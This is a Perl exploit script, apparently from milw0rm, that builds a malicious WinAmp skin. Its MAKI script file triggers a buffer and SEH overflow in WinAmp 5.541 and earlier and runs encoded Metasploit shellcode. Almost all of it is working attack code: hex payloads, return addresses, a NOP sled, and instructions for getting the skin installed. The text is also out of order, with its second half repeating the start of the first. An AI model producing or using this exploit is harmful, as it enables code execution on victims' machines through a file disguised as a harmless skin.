"\x39\xAF\x23\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB\x4B\x44\x32\xFD\x7D".
"\x51\x37\x7C\x4E\xBF\x40\x82\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E\x69".
"\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D".
"\xC4\x8A\xC2\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F\xFF\xE1\x8C\xE2\x01".
"\x59\xB0\xD5\x11\x97\x9F\xE4\xDE\x6F\x51\x76\x0A\xBD\xF8\xF0\x80\xA5\x1B\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34\x2E\x9B".
"\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F".
"\xC4\xAC\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F\x68\x96\xC1\xFE\x29\x61".
"\xB7\xDA\x51\x4D\x91\x65\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B\x3B\x9B".
"\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2".
"\xF6\x84\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC\x41\x65\x12\x00\x00\x00".
"\x01\x01\x00\x00\x11\x00\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x56\x65\x72\x73\x69\x6F\x6E";
my $maki_script2 = "\x01\x01\x00\x00\x0B\x00\x67\x65\x74\x53\x6B\x69\x6E\x4E\x61\x6D\x65\x01\x01\x00\x00\x0D\x00\x67\x65\x74\x50\x72\x69\x76\x61\x74".
"\x65\x49\x6E\x74\x01\x01\x00\x00\x0C\x00\x67\x65\x74\x54\x69\x6D\x65\x4F\x66\x44\x61\x79\x01\x01\x00\x00\x0D\x00\x73\x65\x74\x50".
"\x72\x69\x76\x61\x74\x65\x49\x6E\x74\x01\x01\x00\x00\x0A\x00\x6D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x01\x01\x00\x00\x0F\x00\x69".
"\x6E\x74\x65\x67\x65\x72\x54\x6F\x53\x74\x72\x69\x6E\x67\x01\x01\x00\x00\x0E\x00\x6F\x6E\x53\x63\x72\x69\x70\x74\x4C\x6F\x61\x64".
"\x65\x64\x01\x01\x00\x00\x0E\x00\x67\x65\x74\x53\x63\x72\x69\x70\x74\x47\x72\x6F\x75\x70\x0A\x01\x00\x00\x09\x00\x67\x65\x74\x4F".
"\x62\x6A\x65\x63\x74\x01\x01\x00\x00\x0D\x00\x6F\x6E\x53\x65\x74\x58\x75\x69\x50\x61\x72\x61\x6D\x01\x01\x00\x00\x08\x00\x73\x74".
"\x72\x6C\x6F\x77\x65\x72\x01\x01\x00\x00\x0F\x00\x73\x74\x72\x69\x6E\x67\x54\x6F\x49\x6E\x74\x65\x67\x65\x72\x14\x01\x00\x00\x07".
"\x00\x73\x65\x74\x54\x65\x78\x74\x16\x01\x00\x00\x0B\x00\x73\x65\x74\x58\x6D\x6C\x70\x61\x72\x61\x6D\x14\x01\x00\x00\x0D\x00\x6F".
"\x6E\x54\x65\x78\x74\x43\x68\x61\x6E\x67\x65\x64\x14\x01\x00\x00\x0C\x00\x67\x65\x74\x41\x75\x74\x6F\x57\x69\x64\x74\x68\x14\x01".
"\x00\x00\x0B\x00\x73\x65\x74\x58\x6D\x6C\x50\x61\x72\x61\x6D\x23\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01".
"\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x88\x13\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x16\x01\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x01\x00\x0A\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0D\x00\x00".
"\x00\x07\x00\x00\x00\x0C\x00\x72\x75\x6E\x74\x69\x6D\x65\x63\x68\x65\x63\x6B\x0C\x00\x00\x00\x15\x00\x54\x68\x69\x73\x20\x73\x63".
"\x72\x69\x70\x74\x20\x72\x65\x71\x75\x69\x72\x65\x73\x20\x0D\x00\x00\x00\x1F\x00\x57\x69\x6E\x61\x6D\x70\x20\x35\x2E\x35\x34\x20".
"\x28\x73\x6B\x69\x6E\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x31\x2E\x33\x34\x29\x0E\x00\x00\x00\x05\x00\x45\x72\x72\x6F\x72\x0F\x00".
"\x00\x00\x00\x00\x11\x00\x00\x00\x05\x00\x44\x45\x42\x55\x47\x18\x00\x00\x00\x04\x00\x74\x65\x78\x74\x19\x00\x00\x00\x05\x00\x6C".
"\x61\x62\x65\x6C\x1A\x00\x00\x00\x04\x00\x6C\x69\x6E\x6B\x1D\x00\x00\x00\x05\x00\x73\x68\x69\x66\x74\x1E\x00\x00\x00\x07\x00\x74".
"\x6F\x6F\x6C\x74\x69\x70\x21\x00\x00\x00\x01\x00\x78\x22\x00\x00\x00\x01\x00\x77\x03\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00".
"\x5F\x01\x00\x00\x00\x00\x00\x00\x0A\x00\x00\x00\xCC\x01\x00\x00\x14\x00\x00\x00\x0F\x00\x00\x00\x7B\x02\x00\x00\x1B\x03\x00\x00".
"\x01\x03\x00\x00\x00\x01\x00\x00\x00\x00\x18\x00\x00\x00\x00\x30\x02\x01\x03\x00\x00\x00\x01\x04\x00\x00\x00\x0C\x01\x03\x00\x00".
"\x00\x01\x05\x00\x00\x00\x0A\x51\x10\xB9\x00\x00\x00\x01\x02\x00\x00\x00\x01\x06\x00\x00\x00\x30\x02\x01\x09\x00\x00\x00\x01\x00".
"\x00\x00\x00\x01\x08\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x02\x00\x00\x00\x30\x02\x01\x0A".
"\x00\x00\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x30\x02\x01\x0A\x00\x00\x00\x01\x09\x00\x00\x00\x41\x01\x0B\x00\x00\x00\x0C".
"\x01\x09\x00\x00\x00\x01\x0A\x00\x00\x00\x0C\x50\x10\x06\x00\x00\x00\x01\x08\x00\x00\x00\x21\x01\x00\x00\x00\x00\x01\x00\x00\x00".
"\x00\x18\x03\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x04\x00\x00\x00\x02\x01\x00\x00\x00\x00".
"\x01\x0F\x00\x00\x00\x01\x06\x00\x00\x00\x01\x0E\x00\x00\x00\x01\x0C\x00\x00\x00\x01\x0D\x00\x00\x00\x40\x18\x05\x00\x00\x00\x02".
"\x01\x08\x00\x00\x00\x21\x01\x06\x00\x00\x00\x21\x01\x01\x00\x00\x00\x21\x03\x10\x00\x00\x00\x01\x00\x00\x00\x00\x01\x0F\x00\x00".
"\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x10\x00\x00\x00\x70\x05\x00\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x03\x12\x00".
"\x00\x00\x01\x00\x00\x00\x00\x01\x0F\x00\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x00\x00\x00\x00\x01\x12\x00\x00\x00".
"\x70\x06\x00\x00\x00\x01\x70\x05\x00\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x01\x17\x00\x00\x00\x01\x08\x00\x00\x00\x30\x02\x19".
"\x9C\xFE\xFF\xFF\x11\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x16\x00\x00\x00\x01\x00\x00\x00\x00\x70\x08\x00\x00\x00\x00\x30".
"\x02\x01\x13\x00\x00\x00\x01\x16\x00\x00\x00\x01\x18\x00\x00\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x14\x00\x00\x00\x01\x16\x00".
"\x00\x00\x01\x19\x00\x00\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x15\x00\x00\x00\x01\x16\x00\x00\x00\x01\x1A\x00\x00\x00\x70\x09".
"\x00\x00\x00\x01\x30\x02\x01\x01\x00\x00\x00\x21\x03\x1B\x00\x00\x00\x03\x1C\x00\x00\x00\x01\x02\x00\x00\x00\x10\x06\x00\x00\x00".
"\x01\x01\x00\x00\x00\x21\x01\x00\x00\x00\x00\x01\x1B\x00\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x1D\x00\x00\x00\x08\x10\x17\x00\x00".
"\x00\x01\x17\x00\x00\x00\x01\x00\x00\x00\x00\x01\x1C\x00\x00\x00\x70\x0C\x00\x00\x00\x01\x30\x02\x01\x00\x00\x00\x00\x01\x1B\x00".
"\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x19\x00\x00\x00\x08\x10\x11\x00\x00\x00\x01\x14\x00\x00\x00\x01\x1C\x00\x00\x00\x70\x0D\x00".
"\x00\x00\x01\x02\x01\x00\x00\x00\x00\x01\x1B\x00\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x1A\x00\x00\x00\x08\x10\x16\x00\x00\x00\x01".
"\x15\x00\x00\x00\x01\x1C\x00\x00\x00\x01\x1E\x00\x00\x00\x70\x0E\x00\x00\x00\x02\x02\x01\x01\x00\x00\x00\x21\x03\x1F\x00\x00\x00".
"\x01\x02\x00\x00\x00\x10\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x20\x00\x00\x00\x01\x14\x00\x00\x00\x70\x10\x00\x00\x00\x00".
"\x01\x17\x00\x00\x00\x40\x30\x02\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x01\x20\x00\x00\x00\x70\x06\x00\x00\x00\x01\x01\x21\x00".
"\x00\x00\x70\x11\x00\x00\x00\x02\x02\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x01\x20\x00\x00\x00\x4C\x70\x06\x00\x00\x00\x01\x01".
"\x22\x00\x00\x00\x70\x11\x00\x00\x00\x02\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02".
"\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21";
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d".
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c".
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45".
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36".
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e".
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a".
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d".
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74".
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57".
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38".
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b".
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77".
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b".
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53".
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f".
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31".
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50".
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37".
"\x70\x41";
my $overflow1 = "\x41" x 314;
my $overflow2 = "\x41" x 128;
my $overflow3 = "\x90" x 8;
my $sehjmp = "\xeb\x12\x41\x41";
my $sehret = "\x11\x10\xf0\x14"; #0x14f01011 POP, POP, RET WinAmp's aacPlusDecoder.w5s [Universal Address]
my $eip = "\xf8\x99\x01\x12"; #0x120199F8 JMP ESP
my $nopsled = "\x90" x 12;
print "[x] WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit\n";
print "[x] Discovered and Exploited by SkD (skdrat@ hotmail.com)\n";
print "[x] Creating skin dir\n";
rmdir("SkD's Skin");
mkdir("SkD's Skin");
print "[x] Creating skin.xml file\n";
open(my $skin_xml_file, ">SkD's Skin\\skin.xml");
print $skin_xml_file $skin_xml;
close $skin_xml_file;
print "[x] Creating malicious MAKI script\n";
open(my $maki_script_file, ">SkD's Skin\\s.maki");
binmode $maki_script_file;
print $maki_script_file $maki_script1.
$overflow1.$sehjmp.$sehret.$overflow3.$eip.$nopsled.$shellcode.$overflow2.
$maki_script2;
close $maki_script_file;
print "[x] Universal exploit created!\n";
# milw0rm.com [2009-03-05]
#!/usr/bin/perl
#
# WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit
#
# Discovered and Exploited by SkD (skdrat@hotmail.com)
# -----------------------------------------------------
# WinAmp = http://www.winamp.com
#
# Who doesn't use WinAmp?
#
# This was an 0day for sometime but with the release of
# the new version 5.55, it fixed the buffer overflow vuln.
# I made it universal and very reliable.
# The vulnerability is a mixture of a standard buffer overflow
# with a SEH overflow, so to make it more stable,
# both of the scenarios will be exploited accordingly when one
# is triggered with my exploit :).
# The exploit can also run any shellcode (alpha) so this makes
# it ever so useful.
#
# Instructions:-
# -Run script.
# -Copy the created exploit directory "SkD's Skin" to
# "C:\Program Files\WinAmp\Skins" OR just install it.
# -Choose the skin from WinAmp :)
#
# Enjoy it ladies and gents :)
#
# Shouts out to: -KkD
# -InTeL
# -Jayji
# -str0ke
#
# Note: Author has no responsibility over the damage done with this!
use strict;
use warnings;
my $skin_xml = "\xEF\xBB\xBF\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D".
"\x22\x55\x54\x46\x2D\x38\x22\x20\x73\x74\x61\x6E\x64\x61\x6C\x6F\x6E\x65\x3D\x22\x79\x65\x73\x22\x3F\x3E\x0D\x0A\x0D\x0A\x3C\x57".
"\x69\x6E\x61\x6D\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6F\x6E\x4C\x61\x79\x65\x72\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31".
"\x2E\x33\x34\x22\x3E\x0D\x0A\x09\x3C\x73\x6B\x69\x6E\x69\x6E\x66\x6F\x3E\x0D\x0A\x09\x09\x3C\x76\x65\x72\x73\x69\x6F\x6E\x3E\x31".
"\x2E\x32\x3C\x2F\x76\x65\x72\x73\x69\x6F\x6E\x3E\x0D\x0A\x09\x09\x3C\x6E\x61\x6D\x65\x3E\x42\x65\x6E\x74\x6F\x3C\x2F\x6E\x61\x6D".
"\x65\x3E\x0D\x0A\x09\x09\x3C\x61\x75\x74\x68\x6F\x72\x3E\x53\x6B\x44\x3C\x2F\x61\x75\x74\x68\x6F\x72\x3E\x0D\x0A\x09\x09\x3C\x63".
"\x6F\x6D\x6D\x65\x6E\x74\x3E\x53\x6B\x44\x3C\x2F\x63\x6F\x6D\x6D\x65\x6E\x74\x3E\x0D\x0A\x09\x09\x3C\x65\x6D\x61\x69\x6C\x3E\x73".
"\x6B\x64\x72\x61\x74\x40\x68\x6F\x74\x6D\x61\x69\x6C\x2E\x63\x6F\x6D\x3C\x2F\x65\x6D\x61\x69\x6C\x3E\x0D\x0A\x09\x09\x3C\x73\x63".
"\x72\x65\x65\x6E\x73\x68\x6F\x74\x3E\x53\x6B\x44\x73\x68\x6F\x74\x2E\x70\x6E\x67\x3C\x2F\x73\x63\x72\x65\x65\x6E\x73\x68\x6F\x74".
"\x3E\x0D\x0A\x09\x09\x3C\x68\x6F\x6D\x65\x70\x61\x67\x65\x3E\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x53\x6B\x44\x2E\x63\x6F".
"\x6D\x2F\x3C\x2F\x68\x6F\x6D\x65\x70\x61\x67\x65\x3E\x0D\x0A\x09\x3C\x2F\x73\x6B\x69\x6E\x69\x6E\x66\x6F\x3E\x0D\x0A\x0D\x0A\x09".
"\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x73\x20\x73\x65\x63\x74\x69\x6F\x6E\x3D\x22\x67\x65\x6E\x65\x72\x61\x6C\x22\x3E".
"\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x46\x22\x20\x61\x63".
"\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x46\x49\x4C\x45\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63".
"\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x50\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D".
"\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x50\x4C\x41\x59\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74".
"\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x4F\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B".
"\x45\x59\x5F\x4F\x50\x54\x49\x4F\x4E\x53\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62".
"\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x49\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x56".
"\x49\x45\x57\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C".
"\x74\x2B\x48\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x48\x45\x4C\x50\x22\x20\x2F\x3E".
"\x0D\x0A\x09\x3C\x2F\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61".
"\x74\x6F\x72\x73\x20\x73\x65\x63\x74\x69\x6F\x6E\x3D\x22\x6E\x6F\x72\x6D\x61\x6C\x22\x3E\x0D\x0A\x09\x09\x09\x3C\x61\x63\x63\x65".
"\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x73\x70\x61\x63\x65\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x53\x48\x4F".
"\x57\x5F\x43\x55\x52\x52\x45\x4E\x54\x5F\x54\x52\x41\x43\x4B\x22\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x61\x63\x63\x65\x6C\x65\x72\x61".
"\x74\x6F\x72\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x21\x2D\x2D\x20\x54\x68\x69\x73\x20\x53\x6B\x69\x6E\x20\x75\x73\x65\x73\x20\x73\x68".
"\x61\x72\x65\x64\x20\x47\x72\x61\x70\x68\x69\x63\x73\x2C\x20\x58\x4D\x4C\x20\x61\x6E\x64\x20\x4D\x61\x6B\x69\x20\x66\x72\x6F\x6D".
"\x20\x27\x42\x69\x67\x20\x42\x65\x6E\x74\x6F\x27\x20\x2D\x2D\x3E\x0D\x0A\x0D\x0A\x09\x3C\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A".
"\x09\x09\x3C\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x20\x70\x61\x72\x61\x6D\x3D\x22\x73".
"\x6D\x61\x6C\x6C\x22\x2F\x3E\x20\x3C\x21\x2D\x2D\x20\x4D\x75\x73\x74\x20\x62\x65\x20\x6C\x6F\x61\x64\x65\x64\x20\x61\x74\x20\x66".
"\x69\x72\x73\x74\x20\x2D\x2D\x3E\x0D\x0A\x09\x3C\x2F\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x69\x6E\x63\x6C\x75".
"\x64\x65\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x2F\x3E\x0D\x0A\x0D\x0A\x09\x3C\x73\x63\x72\x69\x70\x74\x73\x3E".
"\x0D\x0A\x09\x09\x3C\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x20\x70\x61\x72\x61\x6D\x3D".
"\x22\x31\x33\x30\x2C\x31\x38\x22\x2F\x3E\x0D\x0A\x09\x3C\x2F\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A\x0D\x0A\x3C\x2F\x57\x69\x6E".
"\x61\x6D\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6F\x6E\x4C\x61\x79\x65\x72\x3E";
my $maki_script1 = "\x46\x47\x03\x04\x17\x00\x00\x00\x27\x00\x00\x00\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5\x32\x35\xF3\xE7\x64\x0F\xF5\xD6".
"\xFA\x93\xB7\x49\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC\xB5\x3A\x02\xB2".
"\x4D\x43\xA1\x4B\xBE\xAE\x59\x63\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38".
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A".
"\xBF\x3C\x9F\x43\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41\x99\xE1\xE3\x4E".
"\x36\xC6\xEC\x4B\x97\xCD\x78\xBC\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60".
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8\x29\x93\x25\x47\x4D\x3E\xAA\x97".
"\xD0\xF4\xA8\x4F\x81\x7B\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC\xFD\x3F\x5E\xB6\x62".
"\x5E\x37\x8D\x40\x8D\xEA\x76\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2\xA8".
"\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F".
"\x39\xAF\x23\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB\x4B\x44\x32\xFD\x7D".
"\x51\x37\x7C\x4E\xBF\x40\x82\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E\x69".
"\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D".
"\xC4\x8A\xC2\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F\xFF\xE1\x8C\xE2\x01".
"\x59\xB0\xD5\x11\x97\x9F\xE4\xDE\x6F\x51\x76\x0A\xBD\xF8\xF0\x80\xA5\x1B\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34\x2E\x9B".
